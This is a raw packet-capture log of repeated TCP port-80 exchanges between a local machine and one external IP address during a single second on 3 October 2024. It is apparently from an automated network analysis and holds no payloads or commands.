Oct 3, 2024 21:36:06.289288044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.290055037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.290070057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.290108919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.291017056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.291033030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.291162968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.291925907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.291943073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.291995049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.292866945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.292885065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.292913914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.292951107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.293812990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.293829918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.293843985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.293880939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.293909073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.294733047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.294748068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.294795990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.295665979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.295681953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.295720100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.295747042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.296411037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.296427011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.296438932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.296480894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.410705090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.410810947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.410855055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.410870075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.410892010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.410914898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.411442041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.411458969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.411508083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.412234068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.412249088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.412298918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.413125992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.413172007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.413465977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.413480043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.413513899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.413523912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.414400101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.414414883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.414443016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.414453030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.415309906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.415324926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.415339947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.415374041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.415400982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.416207075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.416223049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.416273117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.417109966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.417124987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.417154074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.417181015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.418035984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.418051004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.418065071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.418100119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.418123007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.418710947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.418734074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.418781042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.419485092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.419501066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.419532061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.419552088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.420211077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.420227051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.420273066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.420921087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.420937061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.420950890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.420959949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.420998096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.421662092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.421678066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.421706915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.421737909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.422410965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.422426939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.422473907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.423120975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.423137903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.423166037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.423188925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.423842907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.423858881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.423907995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.424521923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.424536943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.424566031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.424591064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.497266054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.497329950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.497432947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.497447014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.497490883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.497905016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.497920036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.497957945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.497971058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.498620033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.498673916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.539810896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.539877892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.539961100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.540020943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.540307045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.540323019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.540349007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.540361881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.540878057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.540894032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.540929079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.540946007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.541527987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.541543007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.541579962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.541594028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.542273998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.542290926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.542305946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.542323112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.542336941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.543035030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.543051004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.543078899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.543097019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.543791056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.543807030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.543821096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.543849945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.543869019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.544539928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.544554949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.544601917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.545295954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.545310020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.545341969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.545363903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.546106100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.546122074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.546165943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.546823025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.546838999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.546853065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.546886921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.546901941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.547434092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.547450066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.547463894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.547491074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.547513962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.548352003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.548367977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.548382044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.548441887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.548441887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.549256086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.549273014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.549292088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.549300909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.549313068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.549324036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.549334049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.549360991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.550189972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.550204992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.550220013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.550229073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.550244093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.550261974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.551055908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.551071882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.551085949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.551117897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.551141977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.551990986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552006006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552020073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552031040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.552047968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552054882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.552067995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.552083015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.552882910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552898884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552912951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.552936077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.552958012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.553797007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.553812981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.553827047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.553849936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.553872108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.554668903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.554683924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.554698944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.554718018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.554724932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.554738998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.554765940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.555469990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.555485964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.555500984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.555530071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.555552959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.556308985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.556324005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.556339025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.556363106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.556385040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.557132959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557147980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557162046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557173014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.557189941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557197094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.557218075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.557229996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.557962894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557979107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.557993889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.558003902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.558012009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.558046103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.558671951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.558687925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.558701992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.558727980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.558738947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.559393883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.559411049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.559425116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.559434891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.559448004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.559458971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.559487104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.585505009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.585695028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.585787058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.585808992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.585858107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.585874081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.586222887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.586239100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.586253881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.586263895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.586278915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.586296082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.587001085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.587017059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.587030888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.587052107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.587070942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.587768078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.587785006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.587812901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.587826014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.626785040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.626962900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.626979113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.627180099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.627234936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.627402067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.627414942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.627460003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.670031071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670056105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670130014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670248032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.670319080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670334101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670351982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.670383930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.670402050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.670903921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.671063900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.671078920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.671119928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.671149015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.672019958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672034979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672048092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672061920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672082901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.672108889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.672804117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672818899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672832966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.672866106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.672888994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.672951937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.673615932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.673661947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.673769951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.673784971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.673810959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.673829079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.674565077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.674580097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.674595118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.674608946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.674618006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.674662113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.675259113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675275087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675287962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675309896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.675323009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.675445080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675913095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.675940990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675955057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675970078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.675978899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.675991058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.676007032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.676085949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.676100969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.676115036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.676126003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.676137924 CEST	49704	80	192.168.2.5	185.215.113.37
